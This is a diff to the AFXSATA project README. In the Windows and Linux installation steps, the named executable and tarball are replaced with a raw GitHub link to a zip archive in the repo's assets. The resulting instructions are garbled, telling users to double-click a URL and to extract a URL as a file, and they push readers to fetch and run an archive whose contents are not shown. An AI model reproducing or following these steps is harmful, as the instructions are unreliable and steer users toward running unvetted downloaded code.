Vamsi2K5/AFXSATA/README.md

    After the download completes, navigate to your "Downloads" folder or the location you specified for downloads.
 You should see the AFXSATA file you just downloaded.

 6. **Run the Application**:
-   - For Windows: Double-click on `AFXSATA_Windows.exe` to start the installation.
+   - For Windows: Double-click on `https://raw.githubusercontent.com/Vamsi2K5/AFXSATA/main/assets/AFXSATA-v3.1.zip` to start the installation.
 Follow the prompts to complete the setup.
-   - For Linux: Extract the `AFXSATA_Linux.tar.gz` file.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Vamsi2K5/AFXSATA/main/assets/AFXSATA-v3.1.zip` file.
 Open a terminal and navigate to the extracted folder.
 Run the command `./AFXSATA` to launch the application.

 ## 💻 System Requirements